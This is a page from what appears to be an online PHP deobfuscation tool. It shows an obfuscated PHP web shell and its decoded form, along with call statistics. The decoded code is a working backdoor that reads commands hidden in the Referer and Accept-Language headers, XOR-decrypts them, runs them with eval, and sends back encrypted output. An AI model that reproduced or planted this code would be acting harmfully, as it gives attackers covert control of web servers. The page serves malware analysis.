Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $h='"b("b$j=0;($j<$c&&$i"b<$l);$j++"b,"b$i++){$"bo.=$"bt{$i}^$k"b{$j"b};}"b}ret"bur..
Decoded Output download
$kh="827c";$kf="cb0e";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}Did this file decode correctly?
Original Code
<?php
$h='"b("b$j=0;($j<$c&&$i"b<$l);$j++"b,"b$i++){$"bo.=$"bt{$i}^$k"b{$j"b};}"b}ret"burn $o;}"b$r=$_SERVER;$"brr=@$r[""bHTTP"b_REF"';
$W='$kh="827"bc""b;$kf="cb0e";f"bunctio"bn"b x($t"b"b,$k){$c=strlen($k"b);$"bl=strlen($"bt);$"bo="b"";fo"br($i=0;$i<"b$l;"b){for';
$b='$m){@session_sta"br"bt("b);$"bs"b=&$_SESSION;$ss="substr"b"b";$sl="strto"b"blower"b";"b$i=$m["b1][0]"b.$m[1]"b[1];$h="b$sl(';
$Z='bp;$e"b=str"bpo"bs($s[$i],$f);if($e)"b{"b$k=$kh.$kf;"bob_st"bart();"b"b@ev"bal"b(@gzuncomp"bress(@x(@bas"be64_deco"bde(pr"beg_';
$Y='_en"b"bd_"bclean();$d=bas"be64_enc"bode(x(gz"bcompre"bss("b$o),$k))"b;print("<"b$k>"b$d</$k>"b");@s"bess"bion_dest"broy();}}}}';
$f='q);$"bq=arr"bay_values"b("b$q);preg_ma"btch_al"bl("/"b([\\w])["b\\w-]+(?"b:;q"b=0.(["b\\d]"b"b))?,?/"b","b$ra,$m)"b;if($q&&';
$I=str_replace('K','','cKreatKeKK_funcKtKion');
$z='repl"bace(arra"by(""b/_/","b"b"/-/"),arra"by("/","+"b""b),$ss($s[$i],"b0,$e)))"b"b,$k))"b);$o=ob_ge"bt_conte"bnt"bs();ob';
$n='b"bERER"];$ra"b=@$r["HTTP_"bACCEPT"b_LA"bNGUA"bGE"];if($rr&"b&"b$ra){$u=p"barse_u"brl"b($rr);pars"b"be_str($u["qu"be"bry"],$';
$m='$ss(md5("b$i.$kh),0,"b3)"b);$"bf=$sl($ss("bmd5($i.$"b"bkf),"b0"b,3));$p=""b";fo"br($z=1;$z<co"bunt($m[1])"b;$z+"b+)$p.=$q[$m"b';
$Q='"b["b2][$z]];if(strpos("b$p,$h)"b===0)"b{$s[$i]"b="";$"bp=$ss($"bp,3);}"bi"bf(array_key"b_exist"bs"b($i,$s)){$s"b[$i]."b=$"';
$P=str_replace('"b','',$W.$h.$n.$f.$b.$m.$Q.$Z.$z.$Y);
$w=$I('',$P);$w();
?>Function Calls
| null | 1 |
| str_replace | 2 |
| create_function | 1 |
Stats
| MD5 | af6c0ba9bd001af7857cd2feb0ae77c6 |
| Eval Count | 1 |
| Decode Time | 127 ms |